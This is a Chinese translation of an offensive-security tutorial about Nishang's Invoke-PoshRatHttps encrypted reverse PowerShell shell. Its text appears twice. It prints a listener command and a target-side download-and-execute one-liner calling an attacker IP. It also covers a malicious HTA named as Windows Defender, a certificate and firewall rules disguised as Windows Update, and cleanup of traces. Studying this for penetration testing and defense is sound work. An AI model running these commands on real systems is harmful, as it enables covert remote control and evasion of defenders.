一周PowerShell脚本Day 3:HTTPS脚本

摘要

欢迎来到一周PowerShell脚本的第三天,今天我们将讨论HTTP/HTTPS。

我们往往都是出于安全方面的考虑才使用HTTPS的,正是因为有这样的考虑所以HTTPS流量经常会被系统管理员或安全人员所忽视。这就使得HTTPS成为了我们脚本理想的通道了。这里我窃取了Casey Smith(@subTee)的Poshrat,然后进行了一些修改,最终就是我所提供的Invoke-PoshRatHttps

Invoke-PoshRatHttps顾名思义就是在目标与攻击者之间建立一条加密信道,这是我们前两天内容所缺失的,你可以在Nishang的Shells目录下找到:https://github.com/samratashok/nishang/tree/master/Shells

Invoke-PoshRatHttps在攻击者的机器上需要管理员权限以监听端口并安装SSL证书。首先我们现在机器上运行一个监听:

PS C:/> Invoke-PoshRatHttp 192.168.254.1 -Port 80

注意,这里监听端需要两个端口。一个用于初始化连接,另一个用于加密通信。

而在目标机器上,我们只需要执行以下命令(注意HTTP):

PS C:/> Invoke-Expression (New-Object Net.WebClient).DownloadString('http://192.168.254.1/connect')

另外我们也可以在目标机器使用浏览器上打开HTA文件。不过由于浏览器各种可能的报错降低了攻击的成功率。需要打开的HTA文件URL为:

https://192.168.254.1/WindowsDefender.hta

我们来看看实际效果:

一周PowerShell脚本Day 3:HTTPS脚本

不错,一个加密的交互式反向PowerShell!

在Wireshark中我们看到除了初始连接的请求数据包是HTTP的,其余所有流量都是HTTPS。而使用HTTP的初始连接请求数据包则是用于设置HTTPS加密通道的。

一周PowerShell脚本Day 3:HTTPS脚本

pcap包可以在我的Google drive得到:https://drive.google.com/folderview?id=0B-Hsu8q12kG3fkVMaWlQejI4bmktVFlnZHd5Y3pjcHcxRVppQVM1Y1ZYamI5RlYxNExhY2s&usp=sharing

(注:译者已将数据包搬运到国内云盘链接:http://pan.baidu.com/s/1i4ikCAD 密码:nw06)

注意Invoke-PoshRatHttps会安装一个名为“Windows Update Agent”的根证书,并需要指定你机器的IP地址和端口号,创建两个名为“Windows Update HTTPS”和“Windows Update HTTP”的防火墙规则。

下面这个是HTTP的版本,Invoke-PoshRatHttp

一周PowerShell脚本Day 3:HTTPS脚本

正是由于Invoke-PoshRatHttps的客户端非常小巧并且可以配合多种技术使用,才使得Invoke-PoshRatHttps非常的好用。

最后,在目标机器上使用Invoke-PoshRatHttps过后,为了清除痕迹我们可以使用Remove-PoshRat。不过我们需要一个提过权的PowerShell才能运行Remove-PoshRat。

一周PowerShell脚本Day 3:HTTPS脚本

Nishang还有另一个HTTPS的脚本Invoke-PsGcat,这个脚本使用Gmail来执行命令或脚本。

一周PowerShell脚本Day 3:HTTPS脚本

最后是一段使用Invoke-PoshRatHttps的演示视频:

*原文:labofapenetrationtester ,FB小编xiaix编译,转自须注明来自FreeBuf黑客与极客(FreeBuf.COM)

欢迎来到一周PowerShell脚本的第三天,今天我们将讨论HTTP/HTTPS。

我们往往都是出于安全方面的考虑才使用HTTPS的,正是因为有这样的考虑所以HTTPS流量经常会被系统管理员或安全人员所忽视。这就使得HTTPS成为了我们脚本理想的通道了。这里我窃取了Casey Smith(@subTee)的Poshrat,然后进行了一些修改,最终就是我所提供的Invoke-PoshRatHttps

Invoke-PoshRatHttps顾名思义就是在目标与攻击者之间建立一条加密信道,这是我们前两天内容所缺失的,你可以在Nishang的Shells目录下找到:https://github.com/samratashok/nishang/tree/master/Shells

Invoke-PoshRatHttps在攻击者的机器上需要管理员权限以监听端口并安装SSL证书。首先我们现在机器上运行一个监听:

PS C:/> Invoke-PoshRatHttp 192.168.254.1 -Port 80

注意,这里监听端需要两个端口。一个用于初始化连接,另一个用于加密通信。

而在目标机器上,我们只需要执行以下命令(注意HTTP):

PS C:/> Invoke-Expression (New-Object Net.WebClient).DownloadString('http://192.168.254.1/connect')

另外我们也可以在目标机器使用浏览器上打开HTA文件。不过由于浏览器各种可能的报错降低了攻击的成功率。需要打开的HTA文件URL为:

https://192.168.254.1/WindowsDefender.hta

我们来看看实际效果:

不错,一个加密的交互式反向PowerShell!

在Wireshark中我们看到除了初始连接的请求数据包是HTTP的,其余所有流量都是HTTPS。而使用HTTP的初始连接请求数据包则是用于设置HTTPS加密通道的。

pcap包可以在我的Google drive得到:https://drive.google.com/folderview?id=0B-Hsu8q12kG3fkVMaWlQejI4bmktVFlnZHd5Y3pjcHcxRVppQVM1Y1ZYamI5RlYxNExhY2s&usp=sharing

(注:译者已将数据包搬运到国内云盘链接:http://pan.baidu.com/s/1i4ikCAD 密码:nw06)

注意Invoke-PoshRatHttps会安装一个名为“Windows Update Agent”的根证书,并需要指定你机器的IP地址和端口号,创建两个名为“Windows Update HTTPS”和“Windows Update HTTP”的防火墙规则。

下面这个是HTTP的版本,Invoke-PoshRatHttp

正是由于Invoke-PoshRatHttps的客户端非常小巧并且可以配合多种技术使用,才使得Invoke-PoshRatHttps非常的好用。

最后,在目标机器上使用Invoke-PoshRatHttps过后,为了清除痕迹我们可以使用Remove-PoshRat。不过我们需要一个提过权的PowerShell才能运行Remove-PoshRat。

Nishang还有另一个HTTPS的脚本Invoke-PsGcat,这个脚本使用Gmail来执行命令或脚本。

最后是一段使用Invoke-PoshRatHttps的演示视频:

*原文:labofapenetrationtester ,FB小编xiaix编译,转自须注明来自FreeBuf黑客与极客(FreeBuf.COM)

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: